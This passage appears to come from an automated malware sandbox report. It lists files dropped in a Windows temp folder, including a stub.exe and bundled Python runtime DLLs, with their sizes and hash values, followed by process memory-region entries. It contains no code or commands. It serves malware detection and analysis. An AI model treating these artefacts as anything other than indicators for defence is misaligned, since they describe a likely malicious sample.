                                                                                                    e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb

                                                                                                    SHA512

                                                                                                    7ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_1468_133636104753410892\VCRUNTIME140.dll
                                                                                                    Filesize

                                                                                                    96KB

                                                                                                    MD5

                                                                                                    f12681a472b9dd04a812e16096514974

                                                                                                    SHA1

                                                                                                    6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                                                                    SHA256

                                                                                                    d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                                                                    SHA512

                                                                                                    7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_1468_133636104753410892\_sqlite3.pyd
                                                                                                    Filesize

                                                                                                    95KB

                                                                                                    MD5

                                                                                                    7f61eacbbba2ecf6bf4acf498fa52ce1

                                                                                                    SHA1

                                                                                                    3174913f971d031929c310b5e51872597d613606

                                                                                                    SHA256

                                                                                                    85de6d0b08b5cc1f2c3225c07338c76e1cab43b4de66619824f7b06cb2284c9e

                                                                                                    SHA512

                                                                                                    a5f6f830c7a5fadc3349b42db0f3da1fddb160d7e488ea175bf9be4732a18e277d2978720c0e294107526561a7011fadab992c555d93e77d4411528e7c4e695a

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_1468_133636104753410892\python3.dll
                                                                                                    Filesize

                                                                                                    63KB

                                                                                                    MD5

                                                                                                    07bd9f1e651ad2409fd0b7d706be6071

                                                                                                    SHA1

                                                                                                    dfeb2221527474a681d6d8b16a5c378847c59d33

                                                                                                    SHA256

                                                                                                    5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5

                                                                                                    SHA512

                                                                                                    def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_1468_133636104753410892\python310.dll
                                                                                                    Filesize

                                                                                                    4.3MB

                                                                                                    MD5

                                                                                                    c80b5cb43e5fe7948c3562c1fff1254e

                                                                                                    SHA1

                                                                                                    f73cb1fb9445c96ecd56b984a1822e502e71ab9d

                                                                                                    SHA256

                                                                                                    058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20

                                                                                                    SHA512

                                                                                                    faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_1468_133636104753410892\stub.exe
                                                                                                    Filesize

                                                                                                    17.9MB

                                                                                                    MD5

                                                                                                    972d9d2422f1a71bed840709024302f8

                                                                                                    SHA1

                                                                                                    e52170710e3c413ae3cfa45fcdecf19db4aa382c

                                                                                                    SHA256

                                                                                                    1c666df4eafab03ecde809ffbc40dd60b8ac2fe7bdca5632c5c4002254e6e564

                                                                                                    SHA512

                                                                                                    3d84252756dcb4820b7794e9a92811d32631b9f3e9bd1a558fd040736b1472c0d00efb6ff7a13ae3bcd327f3bfac2b6ad94a5a3dfbc8ba54511a366c4f4727a6

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpCDD1.tmp
                                                                                                    Filesize

                                                                                                    20KB

                                                                                                    MD5

                                                                                                    22be08f683bcc01d7a9799bbd2c10041

                                                                                                    SHA1

                                                                                                    2efb6041cf3d6e67970135e592569c76fc4c41de

                                                                                                    SHA256

                                                                                                    451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

                                                                                                    SHA512

                                                                                                    0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpCDF3.tmp
                                                                                                    Filesize

                                                                                                    46KB

                                                                                                    MD5

                                                                                                    14ccc9293153deacbb9a20ee8f6ff1b7

                                                                                                    SHA1

                                                                                                    46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

                                                                                                    SHA256

                                                                                                    3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

                                                                                                    SHA512

                                                                                                    916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpCE14.tmp
                                                                                                    Filesize

                                                                                                    112KB

                                                                                                    MD5

                                                                                                    87210e9e528a4ddb09c6b671937c79c6

                                                                                                    SHA1

                                                                                                    3c75314714619f5b55e25769e0985d497f0062f2

                                                                                                    SHA256

                                                                                                    eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

                                                                                                    SHA512

                                                                                                    f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

                                                                                                  • \??\pipe\LOCAL\crashpad_5052_MGKOYVSDWYAMVIWG
                                                                                                    MD5

                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                    SHA1

                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                    SHA256

                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                    SHA512

                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                  • memory/464-16-0x00000000007D0000-0x0000000000C8E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/464-5-0x00000000007D0000-0x0000000000C8E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/464-0-0x00000000007D0000-0x0000000000C8E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/464-3-0x00000000007D0000-0x0000000000C8E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/464-2-0x00000000007D1000-0x00000000007FF000-memory.dmp
                                                                                                    Filesize

                                                                                                    184KB

                                                                                                  • memory/464-1-0x0000000077D46000-0x0000000077D48000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/668-93-0x0000000000B90000-0x0000000000B91000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/668-95-0x0000000000B90000-0x0000000000B91000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/924-293-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-726-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-770-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-256-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-425-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-21-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-20-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-294-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-19-0x0000000000E81000-0x0000000000EAF000-memory.dmp
                                                                                                    Filesize

                                                                                                    184KB

                                                                                                  • memory/924-765-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-763-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-761-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-759-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-702-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-17-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-709-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-734-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-112-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-713-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/924-711-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/960-290-0x0000000001BF0000-0x0000000001BF1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/960-292-0x0000000000B80000-0x000000000139E000-memory.dmp
                                                                                                    Filesize

                                                                                                    8.1MB

                                                                                                  • memory/1044-225-0x0000000000400000-0x0000000000443000-memory.dmp
                                                                                                    Filesize

                                                                                                    268KB

                                                                                                  • memory/1468-590-0x00007FF764320000-0x00007FF764DF5000-memory.dmp
                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                  • memory/2952-586-0x00007FF6CDC80000-0x00007FF6CEEB5000-memory.dmp
                                                                                                    Filesize

                                                                                                    18.2MB

                                                                                                  • memory/3336-507-0x000000001FEB0000-0x00000000203D8000-memory.dmp
                                                                                                    Filesize

                                                                                                    5.2MB

                                                                                                  • memory/3336-498-0x000000001C5B0000-0x000000001C5C2000-memory.dmp
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                  • memory/3336-506-0x000000001F7B0000-0x000000001F972000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.8MB

                                                                                                  • memory/3336-424-0x0000000000AF0000-0x0000000000B7C000-memory.dmp
                                                                                                    Filesize

                                                                                                    560KB

                                                                                                  • memory/3336-505-0x000000001D380000-0x000000001D39E000-memory.dmp
                                                                                                    Filesize

                                                                                                    120KB

                                                                                                  • memory/3336-504-0x000000001EBD0000-0x000000001EC46000-memory.dmp
                                                                                                    Filesize

                                                                                                    472KB

                                                                                                  • memory/3336-497-0x000000001E7C0000-0x000000001E8CA000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.0MB

                                                                                                  • memory/3336-499-0x000000001D150000-0x000000001D18C000-memory.dmp
                                                                                                    Filesize

                                                                                                    240KB

                                                                                                  • memory/3608-199-0x00000239536C0000-0x00000239536E2000-memory.dmp
                                                                                                    Filesize

                                                                                                    136KB

                                                                                                  • memory/3740-205-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/3740-227-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/3764-190-0x00000000001D0000-0x0000000000B28000-memory.dmp
                                                                                                    Filesize

                                                                                                    9.3MB

                                                                                                  • memory/3764-77-0x00000000001D0000-0x0000000000B28000-memory.dmp
                                                                                                    Filesize

                                                                                                    9.3MB

                                                                                                  • memory/3764-503-0x00000000001D0000-0x0000000000B28000-memory.dmp
                                                                                                    Filesize

                                                                                                    9.3MB

                                                                                                  • memory/3764-193-0x00000000055E0000-0x000000000567C000-memory.dmp
                                                                                                    Filesize

                                                                                                    624KB

                                                                                                  • memory/3764-191-0x00000000001D0000-0x0000000000B28000-memory.dmp
                                                                                                    Filesize

                                                                                                    9.3MB

                                                                                                  • memory/4144-260-0x00000000082D0000-0x00000000082EE000-memory.dmp
                                                                                                    Filesize

                                                                                                    120KB

                                                                                                  • memory/4144-224-0x0000000000400000-0x0000000000470000-memory.dmp
                                                                                                    Filesize

                                                                                                    448KB

                                                                                                  • memory/4144-259-0x0000000009770000-0x00000000097E6000-memory.dmp
                                                                                                    Filesize

                                                                                                    472KB

                                                                                                  • memory/4192-46-0x0000000005720000-0x000000000582A000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.0MB

                                                                                                  • memory/4192-43-0x00000000053D0000-0x0000000005462000-memory.dmp
                                                                                                    Filesize

                                                                                                    584KB

                                                                                                  • memory/4192-47-0x0000000005630000-0x0000000005642000-memory.dmp
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                  • memory/4192-48-0x0000000005690000-0x00000000056CC000-memory.dmp
                                                                                                    Filesize

                                                                                                    240KB

                                                                                                  • memory/4192-49-0x0000000005830000-0x000000000587C000-memory.dmp
                                                                                                    Filesize

                                                                                                    304KB

                                                                                                  • memory/4192-40-0x000000007370E000-0x000000007370F000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4192-42-0x00000000058E0000-0x0000000005E86000-memory.dmp
                                                                                                    Filesize

                                                                                                    5.6MB

                                                                                                  • memory/4192-45-0x00000000064B0000-0x0000000006AC8000-memory.dmp
                                                                                                    Filesize

                                                                                                    6.1MB

                                                                                                  • memory/4192-41-0x00000000008A0000-0x00000000008F0000-memory.dmp
                                                                                                    Filesize

                                                                                                    320KB

                                                                                                  • memory/4192-128-0x0000000006E20000-0x0000000006E70000-memory.dmp
                                                                                                    Filesize

                                                                                                    320KB

                                                                                                  • memory/4192-44-0x00000000053C0000-0x00000000053CA000-memory.dmp
                                                                                                    Filesize

                                                                                                    40KB

                                                                                                  • memory/4192-111-0x0000000005F40000-0x0000000005FA6000-memory.dmp
                                                                                                    Filesize

                                                                                                    408KB

                                                                                                  • memory/4328-94-0x0000000000400000-0x0000000000450000-memory.dmp
                                                                                                    Filesize

                                                                                                    320KB

                                                                                                  • memory/4328-207-0x0000000007FB0000-0x0000000008172000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.8MB

                                                                                                  • memory/4328-208-0x00000000086B0000-0x0000000008BDC000-memory.dmp
                                                                                                    Filesize

                                                                                                    5.2MB

                                                                                                  • memory/4764-328-0x0000000000430000-0x00000000008EE000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/4764-303-0x0000000000430000-0x00000000008EE000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/4972-604-0x00007FF633D20000-0x00007FF634356000-memory.dmp
                                                                                                    Filesize

                                                                                                    6.2MB

                                                                                                  • memory/4972-502-0x00007FF633D20000-0x00007FF634356000-memory.dmp
                                                                                                    Filesize

                                                                                                    6.2MB

                                                                                                  • memory/5336-724-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/5336-723-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/5508-602-0x000001D637210000-0x000001D63721A000-memory.dmp
                                                                                                    Filesize

                                                                                                    40KB

                                                                                                  • memory/5508-601-0x000001D637220000-0x000001D637232000-memory.dmp
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                  • memory/5636-605-0x0000000001200000-0x0000000001256000-memory.dmp
                                                                                                    Filesize

                                                                                                    344KB

                                                                                                  • memory/5636-603-0x0000000001200000-0x0000000001256000-memory.dmp
                                                                                                    Filesize

                                                                                                    344KB

                                                                                                  • memory/5880-766-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/5880-768-0x0000000000E80000-0x000000000133E000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB